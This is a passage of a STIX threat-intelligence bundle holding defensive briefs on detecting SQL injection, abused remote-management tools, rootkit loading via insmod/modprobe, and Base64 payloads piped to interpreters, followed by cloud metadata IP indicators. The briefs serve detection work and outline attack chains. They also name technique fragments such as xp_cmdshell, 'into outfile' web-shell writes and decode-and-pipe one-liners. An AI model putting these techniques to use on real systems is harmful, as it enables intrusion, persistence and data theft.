      "spec_version": "2.1",
      "id": "relationship--ae0268ea-d715-5367-8c1b-deb926109593",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c58f576a-b51e-574a-a6ec-e92ece10b859",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3c3fa655-13dc-5891-bcf7-d6a44010e262",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c58f576a-b51e-574a-a6ec-e92ece10b859",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a3ab750-72cc-59fc-8e99-344bd2df089d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c58f576a-b51e-574a-a6ec-e92ece10b859",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Active Scanning",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1595",
          "url": "https://attack.mitre.org/techniques/T1595"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2491d06b-b0b9-5500-88ee-751813f19ac6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c58f576a-b51e-574a-a6ec-e92ece10b859",
      "target_ref": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1f8cc869-4ec4-508e-9db4-8fc6ff0d435b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c58f576a-b51e-574a-a6ec-e92ece10b859",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c58f576a-b51e-574a-a6ec-e92ece10b859",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Server Potential SQL Injection Attempt Detection",
      "description": "## Overview\n\nThis brief addresses the detection of web server potential SQL Injection (SQLi) attempts, as outlined by Elastic's detection rule. SQLi remains a critical threat, enabling attackers to manipulate backend databases, exfiltrate sensitive data, or even execute arbitrary commands. These attempts often originate from automated scanning tools or manual exploitation techniques, probing for vulnerabilities across various SQL dialects (e.g., MySQL, MSSQL, PostgreSQL, Oracle). The detection focuses on identifying characteristic patterns in HTTP request URLs and query strings, encompassing boolean-blind, time-based, error-based, and UNION-based injection methods. Defending against these attempts is crucial as successful SQLi can lead to severe compromises, including full system control and breach of confidential information, impacting any organization running public-facing web applications.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Scanning**: Attacker employs automated tools like `sqlmap` or manual techniques to identify public-facing web applications, discover vulnerable parameters (GET/POST inputs, headers, cookies), and fingerprint the backend database type by sending various SQLi payloads and analyzing server responses (e.g., error messages, time delays).\n2.  **Initial Access via Injection**: The attacker crafts and injects SQL payloads into identified vulnerable parameters of the web application, leveraging vulnerabilities like unsanitized user input to alter the application's intended database queries.\n3.  **Information Gathering \u0026 Credential Access**: Upon successful injection (e.g., error-based, union-based), the attacker queries the database for sensitive information such as database schema, table names, column names, system settings (`@@version`), database users (`user()`, `current_user()`), or stored credentials.\n4.  **Data Exfiltration**: The attacker systematically extracts sensitive data (e.g., customer records, intellectual property, internal configurations) from the database using methods like UNION SELECT statements, `outfile`/`dumpfile` functions, or by inferring data bit-by-bit in blind SQLi scenarios.\n5.  **Execution (if applicable)**: In cases of severe SQLi vulnerabilities (e.g., stacked queries in MSSQL, `xp_cmdshell`), the attacker executes arbitrary commands on the underlying operating system or database server, potentially installing backdoors or furthering compromise.\n6.  **Persistence**: If OS command execution is achieved, the attacker might write web shells or backdoors to the web server's filesystem (`select * into outfile`) to establish persistent access and maintain control over the compromised server.\n7.  **Command and Control (C2)**: With persistence established, the attacker uses the compromised web server or database as a C2 channel, communicating over application layer protocols (HTTP/S) to issue further commands, transfer files, or pivot into the internal network.\n8.  **Impact \u0026 Lateral Movement**: The attacker leverages the compromised web server or database to pivot into the internal network, perform additional reconnaissance, deploy advanced malware, or achieve other objectives, leading to broader system compromise or significant data breaches.\n\n## Impact\n\nA successful SQL injection attack can have severe consequences, including full data exfiltration, system compromise, and unauthorized access to internal networks. Observed damage ranges from the theft of sensitive customer data and intellectual property to the complete takeover of web servers and backend databases, potentially leading to financial losses, reputational damage, and regulatory penalties. If attackers gain remote command execution capabilities, they can deploy ransomware, establish persistent access, or pivot to other systems, resulting in widespread infrastructure compromise. The Elastic rule targets generalized SQLi patterns, implying a broad scope of potential victims across various industries using web applications.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Web Server Potential SQL Injection Attempts\" from this brief to your SIEM/detection platform and tune it for your environment.\n*   Review web server access logs (Nginx, Apache, IIS, Traefik, Zeek) for `cs-uri-stem` and `cs-uri-query` patterns matching the detection logic in the provided Sigma rule.\n*   Enable comprehensive web server access logging on all public-facing web servers, ensuring `cs-uri-stem` and `cs-uri-query` are captured.\n*   Implement a Web Application Firewall (WAF) to detect and block common SQL injection patterns at the network edge, reducing the attack surface.\n*   Prioritize patching and security updates for all web server software and underlying database systems, particularly for known SQLi vulnerabilities.\n*   Educate development teams on secure coding practices, emphasizing the use of parameterized queries and prepared statements to prevent SQL injection.\n",
      "published": "2026-07-03T15:38:12Z",
      "labels": [
        "sql-injection",
        "web-attack",
        "reconnaissance",
        "initial-access",
        "data-exfiltration",
        "command-execution",
        "persistence",
        "cross-platform"
      ],
      "object_refs": [
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/persistence_web_server_potential_sql_injection.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1cc80fa2-aff6-5c70-9e8b-5cc15a0778d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
      "pattern": "[url:value = 'https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:36:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0eaa15b-a94a-56b3-ae1d-ce36ffb7cd77",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "target_ref": "indicator--1cc80fa2-aff6-5c70-9e8b-5cc15a0778d6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8c5c8806-46e2-5d18-9cc0-fa16599481dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json",
      "pattern": "[url:value = 'https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:36:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07df59bd-9913-5ed6-9150-0cbbd7dfff36",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "target_ref": "indicator--8c5c8806-46e2-5d18-9cc0-fa16599481dc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fa68b202-ceee-5dae-842c-acbbdcd2360f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a",
      "pattern": "[url:value = 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:36:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9358eaa8-14fa-501b-8c96-4108c201b0da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "target_ref": "indicator--fa68b202-ceee-5dae-842c-acbbdcd2360f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dc712548-d85e-5d8f-b524-b341eac71943",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf",
      "pattern": "[url:value = 'https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:36:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cfc721b9-ea5b-5ac7-ba05-e24244eb085e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "target_ref": "indicator--dc712548-d85e-5d8f-b524-b341eac71943"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5f2a4e33-ae52-5d00-9cc9-4e4720603820",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://lolrmm.io/",
      "pattern": "[url:value = 'https://lolrmm.io/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:36:36Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84f1ca94-869e-5b06-b2df-7af48dd5a5e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "target_ref": "indicator--5f2a4e33-ae52-5d00-9cc9-4e4720603820"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Access Software",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1219",
          "url": "https://attack.mitre.org/techniques/T1219"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f5d282f-788c-53bc-a742-bab0ea22b644",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "target_ref": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c18e93b8-5e1d-5338-b8db-4673eeffcd70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "First Time Seen Remote Monitoring and Management Tool Detection",
      "description": "## Overview\n\nAdversaries frequently exploit the trusted nature and broad capabilities of legitimate Remote Monitoring and Management (RMM) and remote access software to maintain covert access and control over compromised Windows systems. This threat brief focuses on the detection of these tools when they are observed for the first time on a given endpoint, indicating potential unauthorized deployment. While these tools are essential for IT administration, their abuse facilitates command-and-control (C2), enables persistence, and allows for the execution of arbitrary commands. Notable campaigns, such as those leading to domain-wide ransomware (as highlighted by The DFIR Report), often involve the misuse of RMM solutions like SimpleHelp, AnyDesk, and ConnectWise Control. This detection method identifies suspicious installations by monitoring process names and code signatures for commonly abused RMM tools, specifically triggering when a `host.id` and `process.name` pair has not been seen within a defined 7-day historical window.\n\n## Attack Chain\n\n1.  **Initial Access**: Adversaries gain initial access to an organization's network, often through methods such as phishing, exploiting vulnerable public-facing applications, or supply chain compromises.\n2.  **Execution**: After establishing a foothold, the adversary deploys a legitimate RMM agent or client onto the compromised Windows host. This deployment may occur via various methods, including malicious ISO files (as referenced in a DFIR report) or existing remote access.\n3.  **Persistence**: The installed RMM tool is configured by the adversary to ensure continued access to the compromised system, often by establishing itself as a service or through other autorun mechanisms.\n4.  **Command and Control**: The RMM agent initiates an outbound connection to an adversary-controlled server, establishing a stable and often encrypted C2 channel that blends with legitimate network traffic.\n5.  **Execution via RMM**: The adversary leverages the RMM tool's remote execution capabilities to deploy additional malware, execute commands, exfiltrate data, or initiate further lateral movement within the network.\n6.  **Impact**: The adversary achieves their final objective, which can range from data exfiltration and espionage to the deployment of ransomware, encrypting critical organizational data.\n\n## Impact\n\nThe abuse of RMM tools by adversaries can lead to severe organizational impact. When compromised, RMM tools provide a high level of control over the affected endpoints, enabling attackers to bypass traditional security controls due to the legitimate nature of the software. This can result in widespread data exfiltration, system damage through unauthorized software installations or configurations, and ultimately, significant financial losses due to ransomware deployment and business disruption. CISA has issued advisories highlighting the use of RMM tools in ransomware campaigns, underscoring the critical risk these compromises pose to organizations across all sectors.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"First Time Seen Remote Monitoring and Management Tool (Windows)\" to your SIEM and tune it for your environment.\n*   Ensure Sysmon process creation and code signing event logging is enabled across all Windows endpoints to provide the necessary telemetry for the detection rule.\n*   Investigate all alerts generated by this rule immediately, focusing on the `process.executable`, `process.command_line`, and `process.code_signature.subject_name` fields.\n*   Review network logs for suspicious outbound connections from newly observed RMM processes.\n*   Establish clear organizational policies for RMM tool deployment and usage, including strict change management processes and whitelisting of authorized RMM executables and signers.\n",
      "published": "2026-07-03T15:36:36Z",
      "labels": [
        "command-and-control",
        "persistence",
        "execution",
        "rmm",
        "remote-access",
        "windows"
      ],
      "object_refs": [
        "indicator--1cc80fa2-aff6-5c70-9e8b-5cc15a0778d6",
        "indicator--8c5c8806-46e2-5d18-9cc0-fa16599481dc",
        "indicator--fa68b202-ceee-5dae-842c-acbbdcd2360f",
        "indicator--dc712548-d85e-5d8f-b524-b341eac71943",
        "indicator--5f2a4e33-ae52-5d00-9cc9-4e4720603820",
        "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/surveyor/blob/master/definitions/remote-admin.json"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/sites/default/files/2025-06/aa25-163a-ransomware-simplehelp-rmm-compromise.pdf"
        },
        {
          "source_name": "reference",
          "url": "https://lolrmm.io/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8053d06-ad4a-5459-9437-16c4176b8df2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9a19b47c-c3f5-51c5-9c66-8f8f35cab291",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9a19b47c-c3f5-51c5-9c66-8f8f35cab291",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detecting Malicious Kernel Module Loading via Built-in Utilities on Linux",
      "description": "## Overview\n\nThis threat brief focuses on the malicious use of built-in Linux utilities, specifically `insmod` and `modprobe`, to load arbitrary kernel object (`.ko`) files. Threat actors who have successfully achieved root privileges on a Linux system can abuse these binaries to introduce unauthorized kernel modules, commonly in the form of rootkits. This technique provides the attackers with complete control over the compromised system at the kernel level, allowing them to hide their presence, manipulate system behavior, and evade detection by standard security products. While legitimate system administration might occasionally involve loading kernel modules, manual loading outside of expected software installations or updates is highly uncommon and strongly indicates suspicious or malicious activity. The activity is tied to the Persistence and Defense Evasion tactics, as adversaries establish a hidden foothold and bypass security mechanisms.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to a Linux system through various means, such as exploiting a vulnerable service (e.g., CVE-2024-XXXX), compromising user credentials, or social engineering.\n2.  **Establish Foothold**: The attacker installs a basic backdoor or establishes a reverse shell to maintain access to the compromised system.\n3.  **Privilege Escalation**: The attacker leverages a local privilege escalation vulnerability (e.g., a vulnerable SUID binary, kernel exploit) or misconfiguration to gain root privileges on the system.\n4.  **Transfer Malicious Kernel Module**: The attacker transfers a pre-compiled malicious kernel object file (rootkit) with a `.ko` extension to the compromised system, often in a hidden or obscure directory.\n5.  **Load Kernel Module**: Using the acquired root privileges, the attacker executes `insmod` or `modprobe` from the command line to load the malicious kernel module, integrating it directly into the running kernel.\n6.  **Establish Persistence and Defense Evasion**: The loaded kernel module (rootkit) immediately activates, establishing persistence (e.g., by hooking system calls or manipulating boot processes) and employing defense evasion techniques to hide malicious processes, files, or network connections from security tools and administrators.\n7.  **Command and Control (C2)**: The rootkit facilitates covert command and control communications, enabling the attacker to remotely manage the compromised system without detection.\n8.  **Impact and Exfiltration**: The attacker uses the rootkit's capabilities to achieve their final objective, such as exfiltrating sensitive data, launching further attacks, or maintaining long-term access.\n\n## Impact\n\nThe successful loading of a malicious kernel module through utilities like `insmod` or `modprobe` represents a severe compromise, granting threat actors kernel-level control over the affected Linux system. This deep level of access allows attackers to completely hide their activities, including processes, files, and network connections, from both standard system tools and endpoint security solutions. The primary consequences include potential for full data exfiltration, sustained undetected presence within the network, and the ability to launch further attacks or maintain control over critical infrastructure without immediate discovery. This compromise can affect any sector, as Linux systems are pervasive in server environments, cloud infrastructure, and specialized devices.\n\n## Recommendation\n\n*   Deploy the Sigma rule in this brief to your SIEM and tune for your environment, especially for `process_creation` logs from Linux hosts.\n*   Ensure Elastic Defend (or an equivalent EDR solution) is properly configured on all Linux endpoints to capture `process_creation` events, especially those involving `insmod` and `modprobe` executions.\n*   Implement host-based intrusion detection for suspicious kernel module loads. Review logs from `dmesg` and syslog for any warnings or messages related to tainted or out-of-tree kernel modules.\n*   Investigate any alerts generated by the `Kernel Module Load via Built-in Utility` rule immediately, focusing on the loaded `.ko` file and the parent process tree for unusual activity.\n*   Restrict root privileges to the absolute minimum necessary across your Linux environment to limit the attacker's ability to perform such actions.\n",
      "published": "2026-07-03T15:34:11Z",
      "labels": [
        "persistence",
        "defense-evasion",
        "rootkit",
        "linux",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44d5a5dc-075f-50fd-8e1c-9c0c6e0ba249",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eae36d3c-d5cf-58ff-8919-f42feecc3968",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f8a5616a-53f6-5d8f-940e-1f38c11312fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Deobfuscate/Decode Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1140",
          "url": "https://attack.mitre.org/techniques/T1140"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8fee6cd-94a9-56fe-a07a-0cc71aa96647",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eae36d3c-d5cf-58ff-8919-f42feecc3968",
      "target_ref": "attack-pattern--f8a5616a-53f6-5d8f-940e-1f38c11312fa"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6af2298a-14e5-5aaa-9c1c-521c0ec9f50a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--eae36d3c-d5cf-58ff-8919-f42feecc3968",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--eae36d3c-d5cf-58ff-8919-f42feecc3968",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Base64 Decoded Payload Piped to Interpreter on Linux",
      "description": "## Overview\n\nThis threat brief details a common defense evasion and execution technique employed by adversaries on Linux systems. Attackers use Base64 encoding to obfuscate malicious payloads, such as scripts, binaries, or commands, making them less obvious to security controls and simple string-based detections. These encoded payloads are then delivered to a target system, often via initial access vectors like phishing or vulnerable web applications. Once on the system, a decoding utility (e.g., `base64`, `openssl`, or scripting language functions) is used to decode the payload. Crucially, the decoded output is immediately piped (redirected) to an interpreter, such as `bash`, `python`, `perl`, or `ruby`, for execution. This direct piping mechanism bypasses writing the decoded payload to disk, further hindering detection and forensic analysis. The technique allows attackers to execute arbitrary code dynamically and stealthily, making it a significant concern for Linux endpoint security.\n\n## Attack Chain\n\n1.  **Obfuscation**: An adversary prepares a malicious script or command and encodes it using Base64 to conceal its true nature and evade static signature-based detections.\n2.  **Delivery**: The encoded payload is delivered to the target Linux system, possibly via a compromised web server, a phishing email, or exploitation of a vulnerability.\n3.  **Decoding and Piping**: On the target system, a decoding utility like `base64 -d`, `openssl enc -d -base64`, or a Python/Perl/Ruby one-liner for Base64 decoding is executed. The output of this decoding process is then immediately piped to a command and scripting interpreter.\n4.  **Execution**: A shell (e.g., `bash`, `sh`) or a scripting language interpreter (e.g., `python`, `perl`, `ruby`) receives the decoded malicious payload via standard input and executes it directly in memory.\n5.  **Malicious Activity**: The executed payload performs its intended malicious actions, which could include establishing persistence, downloading additional malware, enumerating system information, escalating privileges, or initiating data exfiltration.\n6.  **Impact**: The successful execution allows the attacker to gain control over the compromised system, move laterally within the network, and achieve their ultimate objectives, such as data theft, system disruption, or ransomware deployment.\n\n## Impact\n\nThe successful exploitation of this technique can lead to severe consequences for an organization. By executing arbitrary code on a compromised Linux system, attackers can establish a persistent foothold, gain unauthorized access to sensitive data, disrupt critical services, or deploy further malicious tools, including ransomware. This method bypasses traditional file-based detections, making it harder for defenders to identify and stop attacks in their early stages. The impact can range from data breaches and operational downtime to financial losses and reputational damage, particularly if the compromised system holds critical business functions or data.\n\n## Recommendation\n\n*   Deploy the Sigma rule in this brief to your SIEM and tune for your environment, focusing on `process_creation` logs for Linux systems where interpreters are launched with suspicious command lines or parent commands.\n*   Enable comprehensive `process_creation` logging (e.g., Sysmon for Linux, Auditd, Elastic Defend) on all Linux endpoints to capture command-line arguments and parent-child process relationships.\n*   Investigate alerts from the Sigma rule by examining the full command line of the interpreter and its parent process for signs of Base64 decoding (`base64 -d`, `openssl -d -base64`, `python -c 'import base64; base64.b64decode('`).\n*   Regularly review and update detection logic to identify evolving obfuscation techniques and common interpreter misuse.\n*   Educate users and enforce strong security practices to prevent initial access vectors that could lead to the delivery of encoded payloads.\n",
      "published": "2026-07-03T15:33:01Z",
      "labels": [
        "defense-evasion",
        "execution",
        "linux",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--f8a5616a-53f6-5d8f-940e-1f38c11312fa",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--708c4d53-451d-50e0-bafa-ed035d3178c6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 169.254.169.254",
      "pattern": "[ipv4-addr:value = '169.254.169.254']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0278e3f-fc29-5ea1-a46b-4e15e9b33cae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "indicator--708c4d53-451d-50e0-bafa-ed035d3178c6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3cb49b86-9b9b-5303-bb0e-034f7f644599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 100.100.100.200",
      "pattern": "[ipv4-addr:value = '100.100.100.200']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91744132-19a1-5542-a6d3-4e2247be2997",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "indicator--3cb49b86-9b9b-5303-bb0e-034f7f644599"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--58fcc205-0660-58e7-84ea-964aeb0b0348",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 169.254.170.2",
      "pattern": "[ipv4-addr:value = '169.254.170.2']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0703ffd2-a716-5f63-82ec-7730515323d0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
